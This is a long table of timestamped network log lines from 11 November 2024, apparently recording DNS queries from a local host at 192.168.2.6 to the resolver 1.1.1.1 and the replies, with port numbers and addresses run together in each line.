                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.412077904 CET53553521.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.417659044 CET53507241.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.474196911 CET5633653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.477722883 CET6377953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.485918045 CET53563361.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.488329887 CET53637791.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.564053059 CET5100053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.568816900 CET5919453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.578509092 CET53591941.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.596298933 CET53510001.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.657803059 CET53572381.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.034383059 CET5121853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.041646957 CET53512181.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.054358959 CET5514253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.086572886 CET53551421.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.130157948 CET5421853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.141669989 CET53542181.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.144282103 CET6122653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.145277023 CET6352753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.151777983 CET6549753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.168847084 CET5390353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.175889015 CET53635271.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.177206039 CET53612261.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.183469057 CET53654971.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.200845957 CET4919653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.200932980 CET53539031.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.208247900 CET53491961.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.223198891 CET6348653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.230279922 CET53634861.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.604166031 CET5070953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.615231037 CET6377253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.615686893 CET6260953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.616175890 CET6360353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.616507053 CET4965953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.616853952 CET6276553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.616916895 CET5602053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.617285013 CET6211953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.617721081 CET5200053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.617847919 CET6461153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.618421078 CET6352153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.619286060 CET5369953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.619904041 CET4995453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.624336004 CET53637721.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.626136065 CET53636031.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.626149893 CET53626091.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.629007101 CET53627651.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.629021883 CET53560201.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.629101992 CET53536991.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.629668951 CET53520001.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.629725933 CET53621191.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.630150080 CET53646111.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.630565882 CET53496591.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.636856079 CET53507091.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.639509916 CET6331553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.640820026 CET6223753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.651042938 CET53622371.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.651053905 CET53635211.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.652462959 CET53633151.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.654305935 CET53499541.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.661923885 CET5217353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.662106037 CET6278153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.662287951 CET5138353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.662441015 CET5742653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.662607908 CET5137053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.662767887 CET5664253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.663192987 CET6079653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.663336992 CET5264353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.663486958 CET5990553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.663616896 CET6150453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.663743019 CET5786553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.664007902 CET5708153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.664086103 CET6392953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.664158106 CET6087853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.664308071 CET5316753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.664328098 CET5369153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.664504051 CET5208353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.664529085 CET5414153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.664688110 CET6096753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.664702892 CET4971453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.672071934 CET53520831.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.672086000 CET53497141.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.672455072 CET53627811.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.672480106 CET53513831.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.673300982 CET53513701.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.673341990 CET53566421.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.673794985 CET53526431.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.673819065 CET53531671.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.673935890 CET53639291.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.673964977 CET53536911.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.674320936 CET53599051.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.674370050 CET53608781.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.674938917 CET53615041.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.675065994 CET53541411.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.675076008 CET53609671.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.682511091 CET53578651.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.683378935 CET53570811.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.694231033 CET53607961.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.694554090 CET53574261.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.694566965 CET53521731.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.706695080 CET5820553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.707467079 CET5775953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.707623959 CET5442053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.707811117 CET6114553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.707942963 CET6521953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.708142996 CET5591753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.708173037 CET5173053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.708362103 CET5789953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.708457947 CET6000853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.709100008 CET5284653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.713746071 CET5739253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.715255976 CET5195153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.716506958 CET6447153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.717144012 CET4947353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.717736959 CET53577591.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.717900038 CET5437753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.718512058 CET53600081.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.719010115 CET53652191.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.719434023 CET53544201.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.719629049 CET53528461.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.719656944 CET53559171.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.721544981 CET5714453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.721851110 CET5281753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.723180056 CET53573921.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.723701000 CET6181053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.724472046 CET53494731.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.726783037 CET53644711.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.728990078 CET53543771.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.731777906 CET53571441.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.733505964 CET53528171.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.738425970 CET53582051.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.740222931 CET53517301.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.740231991 CET53578991.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.740250111 CET53611451.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.744082928 CET6470553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.746213913 CET53519511.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.755603075 CET53618101.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.777965069 CET53647051.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.290885925 CET5206753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.292977095 CET5292253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.296391010 CET6303353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.303109884 CET53529221.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.310357094 CET53520671.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.327938080 CET53630331.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.340756893 CET5510653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.341058016 CET6127553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.348854065 CET53551061.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.351047993 CET53612751.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.356749058 CET5989053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.389003992 CET53598901.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.419492960 CET6070153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.419709921 CET6129453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.431684017 CET53607011.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.432456017 CET53612941.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.150921106 CET6205353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.163419962 CET53620531.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.189436913 CET5152453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.192823887 CET6203653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.193953037 CET5681153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.197180986 CET5497553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.200634003 CET6302253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.207483053 CET53549751.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.209316015 CET5403753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.210484028 CET6453953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.212903023 CET5329353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.216310978 CET5923553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.217775106 CET53568111.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.218430996 CET53630221.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.219274998 CET53540371.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.220201969 CET6287153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.221019030 CET5347853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.221983910 CET53645391.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.222449064 CET53515241.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.222704887 CET5039053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.223084927 CET53532931.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.224440098 CET53620361.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.227435112 CET53592351.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.229922056 CET53628711.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.232316971 CET53534781.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.233146906 CET53503901.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.252037048 CET6009753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.264353991 CET53600971.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.293770075 CET5756453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.294296026 CET5233853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.294544935 CET5292953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.294768095 CET5789753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.295202017 CET5094553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.298085928 CET5111553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.298419952 CET6209653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.298863888 CET5952453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.302171946 CET4981153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.302380085 CET53523381.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.303829908 CET53575641.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.305270910 CET53529291.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.306397915 CET53578971.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.308969975 CET53509451.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.309319973 CET53595241.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.309331894 CET53620961.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.314810038 CET53498111.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.329792023 CET53511151.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.336787939 CET5633553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.337078094 CET6029653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.337281942 CET5558253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.337281942 CET5138053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.337462902 CET6010653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.337500095 CET5883353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.337609053 CET5075453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.337757111 CET6496953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.337872028 CET6268653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.337991953 CET6224853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.338215113 CET6096253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.338399887 CET5473653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.338766098 CET4981053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.344813108 CET53513801.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.346544981 CET53563351.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.347302914 CET53588331.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.347827911 CET53507541.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.348011971 CET53601061.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.348021984 CET53649691.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.348073006 CET53498101.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.348387003 CET53609621.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.348562002 CET53547361.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.348572016 CET53626861.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.349455118 CET53622481.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.356220007 CET53602961.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.367523909 CET5586053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.367693901 CET5724953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.367863894 CET5512253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.367985010 CET6515053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.368128061 CET53555821.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.368139029 CET5490853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.368266106 CET5309853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.368680000 CET5289153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.368825912 CET5015753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.369206905 CET6493153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.369342089 CET6310153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.370728970 CET5400053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.370920897 CET6191153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.371071100 CET5554953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.371212959 CET6552053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.371352911 CET6466153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.371505022 CET4956153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.371644974 CET5246653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.373328924 CET5485853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.373565912 CET6242253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.373729944 CET5889853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.375891924 CET53631011.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.377567053 CET53551221.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.377857924 CET53530981.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.377970934 CET53558601.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.378340960 CET53651501.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.378572941 CET53501571.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.378830910 CET53549081.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.379831076 CET53649311.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.380744934 CET53624221.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.381243944 CET53655201.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.381561995 CET53555491.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.381572008 CET53619111.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.382468939 CET53646611.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.383260965 CET53524661.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.384382963 CET53548581.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.385256052 CET53588981.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.398708105 CET53572491.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.400521040 CET53528911.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.402242899 CET53540001.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.404037952 CET53495611.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.410829067 CET6329253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.440834999 CET53632921.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.515979052 CET5422753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.535593033 CET53542271.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.538573980 CET6014153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.542614937 CET5907053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.544220924 CET6009653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.547856092 CET5493253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.547916889 CET6166453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.549108982 CET53601411.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.550636053 CET6047953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.556174994 CET53590701.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.557221889 CET5235353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.558809042 CET53616641.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.561117887 CET53604791.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.561367035 CET53600961.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.567276955 CET53523531.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.567287922 CET53549321.1.1.1192.168.2.6
